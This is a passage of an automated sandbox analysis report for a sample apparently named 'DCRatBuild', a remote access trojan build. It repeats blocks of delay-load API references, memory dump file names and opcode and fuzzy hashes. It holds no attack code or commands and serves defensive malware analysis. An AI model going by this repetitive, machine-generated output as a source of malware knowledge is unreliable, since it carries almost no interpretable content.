                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 69cb7267b505c7441b503244cc3e3cbf5828f56a1a6955b05a258f265928c71e
                                        • Instruction ID: 2ad512b43755cbbcb9799299773c490abcd9081820e438289ae4ac3f3df7e8ca
                                        • Opcode Fuzzy Hash: 69cb7267b505c7441b503244cc3e3cbf5828f56a1a6955b05a258f265928c71e
                                        • Instruction Fuzzy Hash: 99B012E13AD001BC322C71057C16D36020CC4C3B10330402AB48ED40D2E74C6D490831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f17f89e063b04ddca5ce8c5e32fbbc5d5d2ceb38c5c549bfbfed0a9e09317239
                                        • Instruction ID: 622875384a64a983e733f7a007efcdeddcdfebb89a49888df150579b7c756208
                                        • Opcode Fuzzy Hash: f17f89e063b04ddca5ce8c5e32fbbc5d5d2ceb38c5c549bfbfed0a9e09317239
                                        • Instruction Fuzzy Hash: 93B012E13AC101BC326871047C16D36020CC4C3B10331412BB48ED40C2E74C6D890871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 33be11a7609c1a681fb4308b5a01df0e23a6d3755b56424316b164206a6da3e2
                                        • Instruction ID: 5dfd07b3e67414cf7b0d5db2169693490fd69e25831eaa7ab873a4e6062b0d67
                                        • Opcode Fuzzy Hash: 33be11a7609c1a681fb4308b5a01df0e23a6d3755b56424316b164206a6da3e2
                                        • Instruction Fuzzy Hash: AEB012E13AC001BC322871047C16D36020CC4C3B10330802AB88ED40C2E74C6D490831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: c6108d8e92e5b6a225408aa982cc263fddddfec1021ee0466bccda21d89af344
                                        • Instruction ID: 4d437ce2599d2747ed57c8b1b83e810d8250de3ee3e6076c42dc820b530da177
                                        • Opcode Fuzzy Hash: c6108d8e92e5b6a225408aa982cc263fddddfec1021ee0466bccda21d89af344
                                        • Instruction Fuzzy Hash: 0CB012D13AC101BC326871087C16D36020CC4C3B10331816BB48AD41C2D74C6CCE0871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 331a7085af5db20c956ecafcc57549dbd31f8f8083555c0d9901dac24f898795
                                        • Instruction ID: ac33ec6075991f9cbd3fe5000b29ec361ed7c07b4f7ccc1b43190ab9be2634ac
                                        • Opcode Fuzzy Hash: 331a7085af5db20c956ecafcc57549dbd31f8f8083555c0d9901dac24f898795
                                        • Instruction Fuzzy Hash: 17B012D13AC001BC322C71087D16D36020CC4C3B10330806AB48AD41C2D74C6D4F0831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9d758a8cc0baa8ab0c7a9992107e87fe1706ea2460d8c619348b78f9035fa120
                                        • Instruction ID: 5a20d6a3572e1aee69f121b50438e27c288ee92a4b2d30aeee9e8c924248d68d
                                        • Opcode Fuzzy Hash: 9d758a8cc0baa8ab0c7a9992107e87fe1706ea2460d8c619348b78f9035fa120
                                        • Instruction Fuzzy Hash: ABB012D13AC001BC322871087C16D36020CC4C3B10330C06AB88AD41C2D74C6C4E0831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 383910463fbb6fccc1b408915d739ca03be777348d5d34c6d93054bcf54633f0
                                        • Instruction ID: 1f1677a2dbf82f0e7b607df5d0f8e58b458aba88c6f8bbe752c2eecc0c664aa9
                                        • Opcode Fuzzy Hash: 383910463fbb6fccc1b408915d739ca03be777348d5d34c6d93054bcf54633f0
                                        • Instruction Fuzzy Hash: D5B012D53AD505BC322871047C56D3B020CD4C3B10330402AB48AD40C2D74C6C490931
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d4482c987743c9c4031ea1bbcff3f2c7ed79d2f4330a49410e87fec7579d1d7b
                                        • Instruction ID: faa59db08ed162b281c9c558fe423605f435e514f7621838f99ec5e9de20a7bb
                                        • Opcode Fuzzy Hash: d4482c987743c9c4031ea1bbcff3f2c7ed79d2f4330a49410e87fec7579d1d7b
                                        • Instruction Fuzzy Hash: FDB012D53AC701BC362831007C66C3B020CC4C3B10331457BB48AE40C2D74C6C8D4871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 3f49e095a75a92692691d35e0bc557a816dad305684477735bd8c07b82ee8bcc
                                        • Instruction ID: 763327a39cb32a0f659802fea9b6c8adca5f0e713c64aec96c5015a81206631d
                                        • Opcode Fuzzy Hash: 3f49e095a75a92692691d35e0bc557a816dad305684477735bd8c07b82ee8bcc
                                        • Instruction Fuzzy Hash: 43B012E13AC001FC322C71047D16D36028CC4C3B10730402AB48AD40C2D74C6D4E0831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                         • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                         • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 72957ab0817839e0dde5e3bd66df9db2ce69980f62d07e1ad69271a64baa729f
                                        • Instruction ID: 62ee434211ceb81abb5f7455784c1fc66fe52d76fa61c5b279d5ce9832a02f2b
                                        • Opcode Fuzzy Hash: 72957ab0817839e0dde5e3bd66df9db2ce69980f62d07e1ad69271a64baa729f
                                        • Instruction Fuzzy Hash: 20B012D13BE001BC322871047C16D3A024EC8C3B10730402AB48AD40C2D74C6C490831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: cda1c98667033a40766e5c132f55ba6eb5326423fc0d0f5539f00d2f35ec5e06
                                        • Instruction ID: 6a3cfb9fe30ab7620bc5ab71c64f8caff386377f7b07b98e8a8038b493e6057c
                                        • Opcode Fuzzy Hash: cda1c98667033a40766e5c132f55ba6eb5326423fc0d0f5539f00d2f35ec5e06
                                        • Instruction Fuzzy Hash: 4AB012D13AC001FC322871147C16D36024CC4C3B10331802AB98AD40C2D74C6C490831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9ebe89c4db43a1529c0aec8eb39461dfb84ea3833d92bd137542a0eb5202b455
                                        • Instruction ID: e96bdc80d9ef688d7306bdfcadc07a611f676e6e1beddcd0b2c3d4bb76ec0d39
                                        • Opcode Fuzzy Hash: 9ebe89c4db43a1529c0aec8eb39461dfb84ea3833d92bd137542a0eb5202b455
                                        • Instruction Fuzzy Hash: C7B012E13AD101BC326872047C16D36020EC4C3B10731412BB48AD40C2D74C6C890871
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: a446e82309eef47d302c4cabcad871478f34c1c42d14f224ac0d9869ac85e999
                                        • Instruction ID: 9caa1aaf9b3d54a2131521e9ddb4d35ac7dec2806e0f104585a066cf235207a7
                                        • Opcode Fuzzy Hash: a446e82309eef47d302c4cabcad871478f34c1c42d14f224ac0d9869ac85e999
                                        • Instruction Fuzzy Hash: A8B012D13AD001BC322871047C16D36020EC4C3B10730802AB88AD40C2D74C6C490831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: bb53fa60482f14ce232c9f9a6a5a605beb5fc1a4b3d2cb6f24191a4628dc29bb
                                        • Instruction ID: 78e103e77caddf333d2454393f1e06c275fdec99cbab8c1d917d598445e2fc85
                                        • Opcode Fuzzy Hash: bb53fa60482f14ce232c9f9a6a5a605beb5fc1a4b3d2cb6f24191a4628dc29bb
                                        • Instruction Fuzzy Hash: 50B012D136D001BC322C714A7C16E3E024CC0C6B10330C52BB44AC4146D74C4C4F4431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f37bb151dda0b7ac23c9e73a8dd36e21b4cb423b3fc3421dd3f1bf495793de39
                                        • Instruction ID: 4e2e80a0d3f9ae21fca627d25d7093516ee73771ba4e9fb6c87eb2c1e7146c73
                                        • Opcode Fuzzy Hash: f37bb151dda0b7ac23c9e73a8dd36e21b4cb423b3fc3421dd3f1bf495793de39
                                        • Instruction Fuzzy Hash: 42B012E136C001FC322C71497C16D3A024CC0C1B10330C12BB84AC4146E74C4D4A4431
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DAB2
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 43ea931a52dd6af8a03877f9eb9ea55ee8a665478cd28d05c43df362faa3bf9d
                                        • Instruction ID: 612ecec322b2b09effd5b24a49add938b64ec549087b367f755342921cdd523c
                                        • Opcode Fuzzy Hash: 43ea931a52dd6af8a03877f9eb9ea55ee8a665478cd28d05c43df362faa3bf9d
                                        • Instruction Fuzzy Hash: 8CB012D13AD101BC722C71497C16E3A024CD0C1B10330822BB44AC414AD74C4C4A4531
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074DBD5
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmp
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
